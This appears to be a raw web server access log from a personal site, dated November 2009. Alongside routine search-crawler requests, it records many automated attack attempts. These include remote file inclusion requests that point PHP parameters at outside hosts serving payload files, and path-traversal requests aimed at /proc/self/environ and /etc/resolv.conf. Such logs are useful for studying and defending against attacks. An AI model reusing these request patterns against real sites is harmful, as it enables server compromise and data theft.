222.236.221.47 - - [20/Nov/2009:11:12:08 -0800] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.karlbergs.nu/popup_mode/links/log.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.195.115.237 - - [20/Nov/2009:11:12:08 -0800] "GET /blog/wp-content/plugins/nextgen-gallery/css/nggallery.css?ver=1.0.0 HTTP/1.0" 200 5715 "http://dmulk.com/blog/2009/10/24/" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
67.195.115.237 - - [20/Nov/2009:11:12:09 -0800] "GET /blog/wp-includes/js/thickbox/thickbox.css?ver=20090514 HTTP/1.0" 200 3864 "http://dmulk.com/blog/2009/10/24/" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
210.115.180.221 - - [20/Nov/2009:11:12:21 -0800] "GET /logs/access_080531.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://tikam.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
210.115.180.221 - - [20/Nov/2009:11:12:21 -0800] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://tikam.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
210.115.180.221 - - [20/Nov/2009:11:12:22 -0800] "GET /index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://tikam.fileave.com/id1.txt??? HTTP/1.1" 200 15865 "-" "Mozilla/5.0" "www.dmulk.com"
210.115.180.221 - - [20/Nov/2009:11:12:45 -0800] "GET /logs/access_080501.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://tikam.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [20/Nov/2009:11:13:07 -0800] "GET /logs/access_081125.log/////////?cmd&file=http://withkor.net/snapshot/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [20/Nov/2009:11:13:07 -0800] "GET /logs/////////?cmd&file=http://withkor.net/snapshot/id1.txt?? HTTP/1.1" 200 126798 "-" "Mozilla/5.0" "www.dmulk.com"
115.86.49.6 - - [20/Nov/2009:11:13:08 -0800] "GET /logs/access_091023.log%20%20/index.phpmain.php?x=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
115.86.49.6 - - [20/Nov/2009:11:13:08 -0800] "GET /logs/index.phpmain.php?x=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
115.86.49.6 - - [20/Nov/2009:11:13:08 -0800] "GET /logs/access_080614.log%20%20/index.phpmain.php?x=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [20/Nov/2009:11:13:08 -0800] "GET ////////?cmd&file=http://withkor.net/snapshot/id1.txt?? HTTP/1.1" 200 15943 "-" "Mozilla/5.0" "www.dmulk.com"
115.86.49.6 - - [20/Nov/2009:11:13:09 -0800] "GET /index.phpmain.php?x=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 8174 "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [20/Nov/2009:11:13:09 -0800] "GET /logs/access_081125.log%20%20/////////?cmd&file=http://withkor.net/snapshot/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [20/Nov/2009:11:13:09 -0800] "GET /logs/////////?cmd&file=http://withkor.net/snapshot/id1.txt?? HTTP/1.1" 200 126798 "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [20/Nov/2009:11:13:09 -0800] "GET ////////?cmd&file=http://withkor.net/snapshot/id1.txt?? HTTP/1.1" 200 15942 "-" "Mozilla/5.0" "www.dmulk.com"
216.71.23.37 - - [20/Nov/2009:11:13:55 -0800] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://hostned.ws//sites/hardcore/hard.gif??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
216.71.23.37 - - [20/Nov/2009:11:13:55 -0800] "GET /logs/access_080512.log/components/com_forum/download.php?phpbb_root_path=http://hostned.ws//sites/hardcore/hard.gif??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
216.71.23.37 - - [20/Nov/2009:11:13:55 -0800] "GET /components/com_forum/download.php?phpbb_root_path=http://hostned.ws//sites/hardcore/hard.gif??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
216.71.23.37 - - [20/Nov/2009:11:14:08 -0800] "GET /logs/access_090627.log/components/com_forum/download.php?phpbb_root_path=http://hostned.ws//sites/hardcore/hard.gif??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.55.143.249 - - [20/Nov/2009:11:14:09 -0800] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://www.usher.co.kr/bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.55.143.249 - - [20/Nov/2009:11:14:09 -0800] "GET /components/com_forum/download.php?phpbb_root_path=http://www.usher.co.kr/bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.55.143.249 - - [20/Nov/2009:11:14:09 -0800] "GET /logs/access_080512.log/components/com_forum/download.php?phpbb_root_path=http://www.usher.co.kr/bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.55.143.249 - - [20/Nov/2009:11:14:18 -0800] "GET /logs/access_090627.log/components/com_forum/download.php?phpbb_root_path=http://www.usher.co.kr/bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
222.236.221.47 - - [20/Nov/2009:11:14:39 -0800] "GET /logs/access_081227.log%20%20/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.karlbergs.nu/popup_mode/links/log.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.195.111.181 - - [20/Nov/2009:11:14:41 -0800] "GET /logs/access_080502.log HTTP/1.0" 200 4007803 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
94.236.23.242 - - [20/Nov/2009:11:14:52 -0800] "GET /logs/access_081125.log/////////?cmd&file=http://withkor.net/snapshot/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [20/Nov/2009:11:14:52 -0800] "GET ////////?cmd&file=http://withkor.net/snapshot/id1.txt?? HTTP/1.1" 200 15942 "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [20/Nov/2009:11:14:52 -0800] "GET /logs/////////?cmd&file=http://withkor.net/snapshot/id1.txt?? HTTP/1.1" 200 126798 "-" "Mozilla/5.0" "www.dmulk.com"
115.86.49.6 - - [20/Nov/2009:11:14:54 -0800] "GET /logs/access_080614.log/index.phpmain.php?x=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
115.86.49.6 - - [20/Nov/2009:11:14:54 -0800] "GET /logs/access_091023.log/index.phpmain.php?x=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
115.86.49.6 - - [20/Nov/2009:11:14:54 -0800] "GET /logs/index.phpmain.php?x=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
115.86.49.6 - - [20/Nov/2009:11:14:58 -0800] "GET /index.phpmain.php?x=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 8174 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.221.47 - - [20/Nov/2009:11:15:32 -0800] "GET /logs/access_081116.log%20%20/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.karlbergs.nu/popup_mode/links/log.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
86.109.96.30 - - [20/Nov/2009:11:15:43 -0800] "GET /logs/access_080102.log/scanhttp://hostned.ws//sites/hardcore/safe.gif???? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.dmulk.com"
86.109.96.30 - - [20/Nov/2009:11:15:44 -0800] "GET /scanhttp://hostned.ws//sites/hardcore/safe.gif???? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.dmulk.com"
86.109.96.30 - - [20/Nov/2009:11:15:44 -0800] "GET /logs/scanhttp://hostned.ws//sites/hardcore/safe.gif???? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.dmulk.com"
72.55.143.249 - - [20/Nov/2009:11:16:19 -0800] "GET /logs/access_080512.log%20%20/components/com_forum/download.php?phpbb_root_path=http://www.usher.co.kr/bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.55.143.249 - - [20/Nov/2009:11:16:19 -0800] "GET /logs/access_090627.log%20%20/components/com_forum/download.php?phpbb_root_path=http://www.usher.co.kr/bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.234.200.157 - - [20/Nov/2009:11:17:19 -0800] "GET /logs/access_071016.log/admin/editeur/spaw_control.class.php?spaw_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.dmulk.com"
200.234.200.157 - - [20/Nov/2009:11:17:20 -0800] "GET /logs/access_071016.log/admin/editeur/spaw_control.class.php?spaw_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.dmulk.com"
86.109.96.30 - - [20/Nov/2009:11:17:36 -0800] "GET /logs/access_080512.log/components/com_forum/download.php?phpbb_root_path=http://www.usher.co.kr/bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
86.109.96.30 - - [20/Nov/2009:11:17:36 -0800] "GET /components/com_forum/download.php?phpbb_root_path=http://www.usher.co.kr/bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
86.109.96.30 - - [20/Nov/2009:11:17:36 -0800] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://www.usher.co.kr/bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
66.249.68.200 - - [20/Nov/2009:11:17:39 -0800] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/024_0.jpg HTTP/1.1" 200 0 "-" "Googlebot-Image/1.0" "dmulk.com"
86.109.96.30 - - [20/Nov/2009:11:17:40 -0800] "GET /logs/access_090627.log/components/com_forum/download.php?phpbb_root_path=http://www.usher.co.kr/bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
216.71.23.37 - - [20/Nov/2009:11:17:48 -0800] "GET /logs/access_080512.log%20%20/components/com_forum/download.php?phpbb_root_path=http://hostned.ws//sites/hardcore/hard.gif??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
216.71.23.37 - - [20/Nov/2009:11:17:48 -0800] "GET /logs/access_090627.log%20%20/components/com_forum/download.php?phpbb_root_path=http://hostned.ws//sites/hardcore/hard.gif??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
79.64.223.41 - - [20/Nov/2009:11:17:53 -0800] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
79.64.223.41 - - [20/Nov/2009:11:17:53 -0800] "GET /logs/access_090130.log%20%20/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
79.64.223.41 - - [20/Nov/2009:11:17:54 -0800] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 200 15898 "-" "Mozilla/5.0" "www.dmulk.com"
79.64.223.41 - - [20/Nov/2009:11:18:01 -0800] "GET /logs/access_090124.log%20%20/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.234.200.157 - - [20/Nov/2009:11:18:06 -0800] "GET /admin/editeur/spaw_control.class.php?spaw_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.dmulk.com"
200.234.200.157 - - [20/Nov/2009:11:18:06 -0800] "GET /logs/access_080122.log/admin/editeur/spaw_control.class.php?spaw_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.dmulk.com"
200.234.200.157 - - [20/Nov/2009:11:18:07 -0800] "GET /admin/editeur/spaw_control.class.php?spaw_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.dmulk.com"
200.234.200.157 - - [20/Nov/2009:11:18:07 -0800] "GET /logs/access_080122.log/admin/editeur/spaw_control.class.php?spaw_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15" "www.dmulk.com"
115.86.49.6 - - [20/Nov/2009:11:18:32 -0800] "GET /logs/access_080614.log%20%20/index.phpmain.php?x=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
115.86.49.6 - - [20/Nov/2009:11:18:32 -0800] "GET /logs/access_091023.log%20%20/index.phpmain.php?x=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
66.249.68.200 - - [20/Nov/2009:11:19:13 -0800] "GET /blog/wp-content/gallery/2008-yuma/010.jpg HTTP/1.1" 200 0 "-" "Googlebot-Image/1.0" "dmulk.com"
115.86.49.6 - - [20/Nov/2009:11:19:39 -0800] "GET /logs/access_091023.log/index.phpmain.php?x=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
115.86.49.6 - - [20/Nov/2009:11:19:39 -0800] "GET /logs/access_080614.log/index.phpmain.php?x=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
189.30.242.61 - - [20/Nov/2009:11:19:41 -0800] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://www.usher.co.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
189.30.242.61 - - [20/Nov/2009:11:19:41 -0800] "GET /components/com_forum/download.php?phpbb_root_path=http://www.usher.co.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
189.30.242.61 - - [20/Nov/2009:11:19:41 -0800] "GET /logs/access_080512.log/components/com_forum/download.php?phpbb_root_path=http://www.usher.co.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.192.20.164 - - [20/Nov/2009:11:19:46 -0800] "GET /logs/access_080626.log%20%20/secure.php?cfgProgDir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.192.20.164 - - [20/Nov/2009:11:19:46 -0800] "GET /logs/secure.php?cfgProgDir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.192.20.164 - - [20/Nov/2009:11:19:46 -0800] "GET /secure.php?cfgProgDir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.192.20.164 - - [20/Nov/2009:11:19:51 -0800] "GET /logs/secure.php?cfgProgDir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.192.20.164 - - [20/Nov/2009:11:19:51 -0800] "GET /logs/access_080626.log%20%20/secure.php?cfgProgDir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.192.20.164 - - [20/Nov/2009:11:19:51 -0800] "GET /logs/access_090123.log%20%20/secure.php?cfgProgDir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.192.20.164 - - [20/Nov/2009:11:19:52 -0800] "GET /secure.php?cfgProgDir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
189.30.242.61 - - [20/Nov/2009:11:19:57 -0800] "GET /logs/access_090627.log/components/com_forum/download.php?phpbb_root_path=http://www.usher.co.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.192.20.164 - - [20/Nov/2009:11:19:57 -0800] "GET /logs/access_090123.log%20%20/secure.php?cfgProgDir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
86.109.96.30 - - [20/Nov/2009:11:20:33 -0800] "GET /logs/access_080512.log%20%20/components/com_forum/download.php?phpbb_root_path=http://www.usher.co.kr/bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
86.109.96.30 - - [20/Nov/2009:11:20:39 -0800] "GET /logs/access_090627.log%20%20/components/com_forum/download.php?phpbb_root_path=http://www.usher.co.kr/bbs/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.192.20.164 - - [20/Nov/2009:11:20:50 -0800] "GET /secure.php?cfgProgDir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.192.20.164 - - [20/Nov/2009:11:20:50 -0800] "GET /logs/access_080626.log/secure.php?cfgProgDir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.192.20.164 - - [20/Nov/2009:11:20:50 -0800] "GET /logs/secure.php?cfgProgDir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.192.20.164 - - [20/Nov/2009:11:20:54 -0800] "GET /logs/access_080626.log/secure.php?cfgProgDir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.192.20.164 - - [20/Nov/2009:11:20:54 -0800] "GET /logs/secure.php?cfgProgDir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.192.20.164 - - [20/Nov/2009:11:20:54 -0800] "GET /secure.php?cfgProgDir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.192.20.164 - - [20/Nov/2009:11:20:55 -0800] "GET /logs/access_090123.log/secure.php?cfgProgDir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.192.20.164 - - [20/Nov/2009:11:21:00 -0800] "GET /logs/access_090123.log/secure.php?cfgProgDir=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [20/Nov/2009:11:22:17 -0800] "GET /logs/access_090518.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://withkor.net/snapshot/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [20/Nov/2009:11:22:17 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://withkor.net/snapshot/id1.txt?? HTTP/1.1" 200 126793 "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [20/Nov/2009:11:22:17 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://withkor.net/snapshot/id1.txt?? HTTP/1.1" 200 15956 "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [20/Nov/2009:11:22:36 -0800] "GET /logs/access_091021.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://withkor.net/snapshot/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
78.108.57.125 - - [20/Nov/2009:11:23:05 -0800] "GET /png.php?include_path=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.dmulk.com"
78.108.57.125 - - [20/Nov/2009:11:23:06 -0800] "GET /png.php?include_path=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.dmulk.com"
78.108.57.125 - - [20/Nov/2009:11:23:06 -0800] "GET /png.php?include_path=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/resolv.conf%20 HTTP/1.1" 404 - "-" "-" "www.dmulk.com"
67.195.111.181 - - [20/Nov/2009:11:24:35 -0800] "GET /bikes/cb750K6/?S=A HTTP/1.0" 200 1610 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
78.108.57.125 - - [20/Nov/2009:11:24:58 -0800] "GET /ckshop.php?incdir=http://204.3.167.134/bbs/skin/zinbbs/zimg/echo????????????????????????????????????????????????????????????????????????????????????????????????~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~?&mode=id HTTP/1.1" 404 - "-" "-" "www.dmulk.com"
78.108.57.125 - - [20/Nov/2009:11:25:33 -0800] "GET /genlib.php?cms[tngpath]=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.dmulk.com"
78.108.57.125 - - [20/Nov/2009:11:25:34 -0800] "GET /genlib.php?cms[tngpath]=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.dmulk.com"
78.108.57.125 - - [20/Nov/2009:11:25:34 -0800] "GET /genlib.php?cms[tngpath]=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/resolv.conf%20 HTTP/1.1" 404 - "-" "-" "www.dmulk.com"
67.195.111.181 - - [20/Nov/2009:11:26:02 -0800] "GET /logs/access_090118.log HTTP/1.0" 200 3562748 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
76.13.192.35 - - [20/Nov/2009:11:26:09 -0800] "GET /retreat1_21921.jpg HTTP/1.1" 404 - "-" "YahooCacheSystem" "dmulk.com"
67.195.111.181 - - [20/Nov/2009:11:27:36 -0800] "GET /bikes/dteel/2008_01_27/?D=A HTTP/1.0" 200 5034 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
78.108.57.125 - - [20/Nov/2009:11:27:50 -0800] "GET /picture.php?id=http://204.3.167.134/bbs/skin/zinbbs/zimg/echo????????????????????????????????????????????????????????????????????????????????????????????????~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~?&mode=id HTTP/1.1" 404 - "-" "-" "www.dmulk.com"
189.30.242.61 - - [20/Nov/2009:11:29:10 -0800] "GET /logs/access_080512.log%20%20/components/com_forum/download.php?phpbb_root_path=http://www.usher.co.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
189.30.242.61 - - [20/Nov/2009:11:29:10 -0800] "GET /logs/access_090627.log%20%20/components/com_forum/download.php?phpbb_root_path=http://www.usher.co.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
157.100.230.82 - - [20/Nov/2009:11:29:24 -0800] "GET /logs/access_090623.log%20%20//galeria.php?start=0&kategoria=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
157.100.230.82 - - [20/Nov/2009:11:29:24 -0800] "GET /galeria.php?start=0&kategoria=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
157.100.230.82 - - [20/Nov/2009:11:29:24 -0800] "GET /logs/access_081121.log%20%20//galeria.php?start=0&kategoria=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
157.100.230.82 - - [20/Nov/2009:11:29:24 -0800] "GET /logs//galeria.php?start=0&kategoria=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
69.162.109.186 - - [20/Nov/2009:11:29:26 -0800] "GET /logs/access_090925.log//skin/zero_vote/error.php?dir=http://www.sanagustin.edu.bo/modules/readme.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.dmulk.com"
69.162.109.186 - - [20/Nov/2009:11:29:26 -0800] "GET /skin/zero_vote/error.php?dir=http://www.sanagustin.edu.bo/modules/readme.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.dmulk.com"
69.162.109.186 - - [20/Nov/2009:11:29:26 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.sanagustin.edu.bo/modules/readme.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.dmulk.com"
69.162.109.186 - - [20/Nov/2009:11:29:28 -0800] "GET /skin/zero_vote/error.php?dir=http://www.sanagustin.edu.bo/modules/readme.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.dmulk.com"
190.95.231.98 - - [20/Nov/2009:11:29:34 -0800] "GET /logs/access_081121.log%20%20//galeria.php?start=0&kategoria=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
190.95.231.98 - - [20/Nov/2009:11:29:34 -0800] "GET /logs/access_090623.log%20%20//galeria.php?start=0&kategoria=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
190.95.231.98 - - [20/Nov/2009:11:29:34 -0800] "GET /logs//galeria.php?start=0&kategoria=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
190.95.231.98 - - [20/Nov/2009:11:29:34 -0800] "GET /galeria.php?start=0&kategoria=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
157.100.230.82 - - [20/Nov/2009:11:30:20 -0800] "GET /logs/access_090623.log%20%20//galeria.php?start=0&kategoria=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
157.100.230.82 - - [20/Nov/2009:11:30:20 -0800] "GET /galeria.php?start=0&kategoria=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
157.100.230.82 - - [20/Nov/2009:11:30:20 -0800] "GET /logs//galeria.php?start=0&kategoria=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
